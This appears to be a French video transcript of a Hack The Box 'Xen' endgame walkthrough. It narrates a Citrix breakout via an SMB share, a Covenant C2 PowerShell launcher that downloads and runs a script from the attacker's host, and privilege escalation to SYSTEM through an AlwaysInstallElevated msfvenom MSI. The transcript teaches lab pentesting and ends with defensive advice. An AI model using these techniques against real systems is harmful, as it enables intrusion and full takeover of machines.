Bonjour à toutes et à tous, apprentis hackeuses et apprentis hackers. Cette semaine, on va, pour ne pas vous laisser sur votre faim, poursuivre le hack de la semaine dernière. Donc, qui était la semaine dernière, on a fait la première des 6 parties, des 6 étapes du endgame Xen de Hack the Box. Et donc, on va faire aujourd'hui la deuxième étape, la deuxième de ces 6 étapes, dans ce hack d'une entreprise fictive de vente au détail. Donc la semaine dernière, on avait, grâce au phishing, pu récupérer un identifiant et un mot de passe qui marchait pour se connecter sur le /remote, donc sur le Citrix Xenapp qui était disponible sur le site de cette entreprise. Et donc n'hésitez pas à regarder la vidéo de la semaine dernière, hein, c'est quand même mieux de les regarder dans l'ordre pour cette série. Du coup, je vais me connecter sur la machine à laquelle on avait obtenu les accès de la semaine dernière. Et donc là, le but du jeu, c'est que on va essayer de... En fait, on a 3 possibilités en général, hein, quand on a réussi à obtenir un shell sur une machine de la cible. Soit on essaye d'élever ses droits, soit on essaye d'utiliser cette machine comme rebond pour accéder au reste du réseau. Soit on regarde déjà à quoi on a accès, parce que potentiellement on peut déjà exfiltrer des données intéressantes, notamment tout ce qui est authentification, login, mot de passe, credential, quoi. Donc, si vous vous souvenez bien, les deux identifiants, le login c'était Awardel qu'on avait pu poney, et le mot de passe c'était Memento Moria. Je sais pas s'il y a un rapport avec Seigneur des Anneaux. Moria. Donc je lance via Citrix le bureau à distance. Et donc Anita Wardell, c'était la commerciale du coup, puisque c'était sales à l'adresse email sales qu'on avait envoyé, qui avait cliqué sur le lien et qui avait rentré ses identifiants dans le site cloné qu'on avait effectué avec Social Engineering Toolkit. Et cela nous donne accès à cette machine. Et on avait déjà remarqué la semaine dernière que quand on allait chercher le flag, que c'était déjà surprenant puisqu'on n'avait pas accès à download. Donc on se rend déjà vite compte qu'on va pas avoir accès à grand chose et que ce bureau à distance est fortement comment on appelle ça, durci. Et par exemple je peux même pas aller sur ces 2 points, je pense. Voilà, ça met un peu de temps mais c'est bien interdit. Et donc on n'a pas moyen de faire un CMD sur cette machine. Ok, donc quand on voit ça, on se dit très bien, il va falloir bypasser ce durcissement. Et donc pour bypasser ce durcissement, il y a une bonne technique qui consiste déjà à générer un cmd.exe de notre côté. Donc pour cela, c'est relativement simple, hein, il suffit de créer, et je crois que je l'ai déjà fait, oui voilà, j'ai créé un salander.c, donc un code source en langage C qui contient que 4 lignes. Et c'est simple, hein, il fait juste un système C Windows system32 cmd.exe. Donc il lance le CMD. Cet exécutable, on va essayer, évidemment, de l'exécuter sur la cible. Alors dans un premier temps, c'est du code C, donc il faut que je le compile. Donc si vous ne l'avez pas déjà installé, il faut installer MingW, donc il y a un compileur cross-platform en faisant cette commande, enfin avec sudo d'ailleurs. Et moi je l'ai déjà installé, donc je peux directement faire x86 64 w64 ming w32 gcc. Et donc salander.c que je vais compiler en salander.exe. Voilà, donc ça nous permet d'avoir l'exécutable. Et maintenant cet exécutable, je veux l'exécuter sur la cible. Alors une des techniques possibles, et qui est celle qui va fonctionner, hein, puisque je rappelle que j'ai déjà fait la machine, et afin de ne pas faire une vidéo trop longue, je fais directement la solution qui marche bien. Et la solution qui marche bien, c'est de créer son serveur SMB
et d'accéder à l'exécutable qu'on a créé depuis la cible. Donc pour créer le serveur SMB, c'est relativement simple, il suffit d'utiliser SMB server. SMB server, il est là. Qui est donc un des fabuleux scripts Python qu'il y a dans Impacket, qui permet de rapidement créer un serveur SMB sur sa machine. Donc je vais créer un chair qui s'appelle Salander chair, un dossier tout simplement. Et ce dossier, du coup, il faut que j'aille dedans d'abord. Salander chair. Et du coup après je vais lancer cette commande, donc c'est le fameux script de Impacket, -smb de support pour dire qu'on supporte le SMB version 2. Salander share, ça c'est juste pour indiquer sur la cible que le chair s'appelle Salander chair. Et $password, donc je rappelle sur Linux quand on fait un dollar et on met une commande entre parenthèses, ben cette commande va être exécutée et va remplacer la variable ce qui suit là. Donc du coup ça va remplacer ce dollar et le truc en parenthèse par /home, /kali et tout ça, par la sortie de pwd. Tout ça pour dire que grâce à cette commande, j'ai un partage SMB de lancer sur le répertoire courant. Et donc, vu que dans ce répertoire courant, il n'y a rien, il faut évidemment que je déplace salander.exe que je viens de générer dans ce répertoire courant afin qu'il soit accessible à tous les clients qui se connecteront à un SMB, à mon serveur SMB. Il me reste plus que à aller sur ma cible, tac, et à me connecter au chair. Alors c'est pas simple parce que le backslash a du mal à passer à travers Citrix Xenap. J'ai réussi tout à l'heure, donc je pense que j'arriverai ou pas à le refaire. En fait même le clavier passe pas. Ah si, non. Les joyeusetés de Citrix. Qu'est-ce que je peux faire pour que ça remarche? Je pense qu'on est bon pour fermer et relancer. Allons-y. Log off. Non plus. Ça marche trop bien. Allez, on relance. Bim. Deuxième essai. Bon là déjà j'ai récupéré le clavier. Maintenant est-ce que je vais réussir à faire un backslash? Le slash il passe nickel, mais alors le backslash ça a vraiment du mal. Voilà, j'ai réussi à le faire, du coup je vais copier-coller sinon je vais galérer pendant 10 ans. Alors maintenant on met notre adresse IP de notre serveur SMB, qui est donc notre IP, dans une vraie attaque ça serait l'IP public, mais nous on est dans un VPN puisque c'est un endgame, donc on met l'adresse IP dans le VPN. Et il me reste plus qu'à mettre Salander chair. Et on voit que c'est bloqué aussi, donc c'est pas si simple. Alors il y a une astuce assez con pour outrepasser ce blocage, c'est de ouvrir n'importe quoi qui a la possibilité de faire une ouverture. Je m'explique. Welcome to City, on s'en fout de ça, close. Donc par exemple un paint, si je fais CTRL O, donc je peux ouvrir quelque chose. Si je mets le backslash ici, ça va faire le même message d'erreur. Par contre, étrangement, si je mets super, je l'ai gardé en copie. Le 10, 14, 14, 4 Salander chair. Et ben là, il accède à mon chair. Et donc j'ai bien le salander.exe.
que je vais pouvoir exécuter en faisant clic droit, open, run. Et voilà, on a pu obtenir un shell malgré le durcissement de ce Windows. Alors pour rappel, par contre, dans la vraie vie, ça aurait probablement pas marché, enfin de moins en moins, ça, chez mes clients en tout cas c'est de plus en plus le cas, ils ferment le port TCP 445 en sortie vers internet. Donc si le port 445 était fermé, évidemment notre serveur SMB n'aurait pas pu être accédé. Super, donc maintenant qu'on a le shell, on va pouvoir regarder pour élever ses droits. Donc pour élever ses droits, pour changer un peu et pas faire comme les précédentes vidéos Acksize, je vais utiliser Covenant, qui est donc un framework C2 Command and Control, utilisé plus souvent dans le cadre de la Red Team, mais on peut l'utiliser durant un test d'intrusion classique. Donc je vais le lancer de ce pas. Je vais le lancer en tant que route. Pourquoi? Parce que on va utiliser des ports en dessous de 1024, donc il y aura besoin d'être route. Donc je vais lancer ce framework que j'ai installé dans mes outils dans Covenant. Run. Donc c'est du .NET, hein, donc c'est un peu lent. Et donc en gros ça va nous ouvrir une interface en local, voilà. On va pouvoir se connecter donc sur notre machine attaquante, sur laquelle on va pouvoir se connecter. Donc moi, mon username c'est Lisbeth, et le mot de passe, eh bien, je ne vous le dirai pas. Voilà, donc on tombe sur le dashboard. Et nous, ce qu'on veut faire, c'est donc créer ce qu'on appelle un grunts. Et pour avoir un grunts, eh bien, il faut mettre un listener en écoute. Donc on va faire ça de ce pas. On clique sur listener, create. Et là, du coup, il y a un nom qui est choisi par défaut. Vous pouvez le modifier si vous voulez, mais on va laisser ça. Donc nous, on va écouter sur le port 80, ce qui me paraît très bien. Par contre, la différence, c'est qu'on va, par rapport à la configuration fournie par défaut, c'est qu'on ne va pas écouter sur le port 127.0.1.1, mais sur le port de l'interface VPN. Tac. Use SSL, on peut laisser false. Et on va prendre le défaut HTTP profil. Et on peut cliquer sur create. Donc ça crée un listener en écoute sur le port HTTP. Et du coup, maintenant qu'on a le listener en place, on va faire ce qu'on appelle un launcher. Donc le launcher, c'est comment on va exécuter le code sur la cible qui va se connecter au listener. Dans notre cas, vu qu'on a un shell ouvert, bon, on peut le faire en PowerShell. Donc le listener, on sélectionne celui en question. Ça, je n'ai pas besoin de changer. Pour binding, le delay, tout ça, ça me convient bien par défaut. Kill date aussi. Paramètre string, très bien. Je pense qu'on est bon. Hein. Generate. Voilà, ça nous crée la commande en dessous. Et si on va sur l'onglet host, on peut mettre l'URI sur lequel écouter. Donc, on va mettre lichel.ps1. J'aurais pas dû faire entrer lichel.ps1. Qui permettra donc d'aller chercher notre shell PS1, donc notre script PowerShell, à l'endroit qui convient bien. Ma foi, je pense qu'on est bon. Je
pense qu'on est bon, donc j'ai plus qu'à faire ici copier, donc ça va copier cette ligne de commande à exécuter sur la cible, et on va essayer de l'exécuter sur le shell qu'on a obtenu. Paste. Donc ça ferme la fenêtre, pourquoi? Parce que dans notre ligne de code on a mis window hidden, et on voit grunt activated, donc on a bien l'équivalent d'une session Meterpreter, on va dire, si vous êtes sur Metasploit. Donc parfait, maintenant qu'on a cette session grunts ouvert, on peut cliquer dessus, et on peut cliquer sur Interact pour interagir avec. Et du coup, nous ce qui nous intéresse, c'est, je vous rappelle, d'élever nos droits sur cette machine. Et du coup, pour élever nos droits, il y a plusieurs possibilités, mais une des plus répandues, c'est d'utiliser la commande sharp up, qui est donc un script sharp, C sharp, pour chercher les possibilités d'élévation de privilèges sur la cible. Je le lance, et on va patienter pour voir s'il trouve quelque chose. Donc c'est un peu l'équivalent de linpiece sur Linux pour énumérer les possibilités d'élévation de privilèges. Et là on n'a pas à attendre longtemps, on voit que très vite il trouve que le Always Install Elevated Registry Key est set to 1, que ce soit sur la branche HKLM ou la branche HKCU. Ce qui signifie qu'on peut exécuter des MSI sur la cible, et quand on exécute des MSI sur la cible, ils sont exécutés en tant que route. Mais il y a une hackeuse, la hackeuse de la semaine, qui en parle bien mieux que moi. Elle s'appelle Bousra Demir, et elle utilise Metasploit. Donc pour ceux qui veulent utiliser Metasploit pour exploiter cette possibilité de privesc, je vous conseille cette vidéo que je vais mettre en dessous en lien de ma vidéo. Bien, ceci étant dit, on va donc essayer d'exploiter cette possibilité d'élévation de privilèges. Donc pour ça, il va donc falloir générer un MSI qui sera exécuté avec les droits système. Donc je vais le mettre ici par exemple, MSF Venom. Donc on veut une payload Windows, hein, x64, payload Windows qui va exécuter la commande suivante, cmd/c PowerShell IEX. Bon, en fait ça va beaucoup ressembler à ce qu'on a exécuté sur la cible dans la fenêtre qui s'est cachée suite à l'exécution, parce qu'il y avait window hidden. New object net web client download string http notre IP. Donc moi c'est lichel.ps1. Donc c'est strictement la même commande qu'on a exécutée sur l'interface via Citrix Xenap, mais quand on l'avait exécuté, nous notre shell il avait les droits de Anita, donc on a obtenu un grunts avec les droits d'Anita, et là on espère qu'en exécutant le MSI on devrait obtenir un grunts avec les droits système, donc avec des droits plus élevés. MSF Venom, je pense que j'en ai déjà parlé dans une précédente vidéo de Hacksai, c'est pour ça que je détaille pas plus que ça. Pendant qu'il mouline, je vais checker ça. MSF Venom. Yes, dans Devil. Donc on attend toujours le MSF Venom. Les MSI c'est pas super optimisé, donc c'est un peu long à générer. Juste pour faire une commande PowerShell, le truc il va faire genre 150 kilooctets. Et voilà.
Donc on a notre MSI générique qui s'appelle lisbeth.msi. Évidemment, tout comme l'exécutable qu'on veut exécuter sur la cible, il faut que je le mette dans le partage, parce qu'on va l'exécuter à travers le partage SMB. Cylinder Chair. Et donc maintenant on a notre lisbeth.msi dans le partage. Donc on peut revenir sur notre grunts qui interagit avec la cible en tant que Anita, et on peut lancer une commande shell avec l'instruction native Windows MSI exec /q/i, ça c'est plus pour que ce soit plus discret, et 14.14.4 qui est notre IP. Notre partage c'est Lisbeth ou Cylinder Chair. Et par contre c'est lisbeth.msi que je l'ai appelé le MSI. Oui, c'est ça. Donc on le lance, send. Shell cmd task, donc c'est mis dans le pipe. Et si ça marche, nous avons en haut à droite un nouveau grunts qui est en interaction avec nous et qui ce coup-ci a les droits système. Donc on a pu élever nos privilèges sur cette cible. Donc j'interagis avec ce nouveau grunts. Et si je fais par exemple un ls/users, pour voir donc les utilisateurs présents sur cette machine Windows, on voit bien que j'ai accès à tous ces utilisateurs. Et si j'affiche users, donc administrator desktop, pour voir ce qu'il y a sur le bureau de l'administrateur, on voit qu'il y a en effet le flag et un power view, et ça dans la vraie vie vous l'aurez pas, ça c'est sûrement quelqu'un d'autre sur Xbox qui est en train de pirater la machine qui l'a mis. Et donc il ne reste plus qu'à faire un cat users administrator desktop flag.txt pour afficher le second flag de ce endgame. Hop, il est là. Je les affiche en clair parce que c'est un endgame retired, donc il n'y a plus pas d'intérêt à vous les cacher. Du coup, globalement, on a pu donc élever nos privilèges dans cette seconde étape de hacking sur cette entreprise fictive de vente au détail. On a pu le faire principalement à cause de deux problématiques. La première, c'est donc qu'ils n'ont pas fermé en sortie le port 445, ça j'en ai déjà parlé. Et la seconde, c'est que c'est la plus grosse problématique, hein, c'est la vulnérabilité de laisser dans la base de registre la possibilité d'exécuter des MSI en tant que de système. C'est évidemment très déconseillé et à laisser uniquement s'il y a une grosse contrainte qui vous l'oblige à le laisser. Sinon, comme on peut le voir, un hacker ou une hackeuse peut l'utiliser pour élever ses droits sur la machine. Bref, j'espère que ça vous a plu, n'hésitez pas à laisser des commentaires, et à la semaine prochaine pour faire un pas de plus vers le niveau hacking de Lisbeth Salander.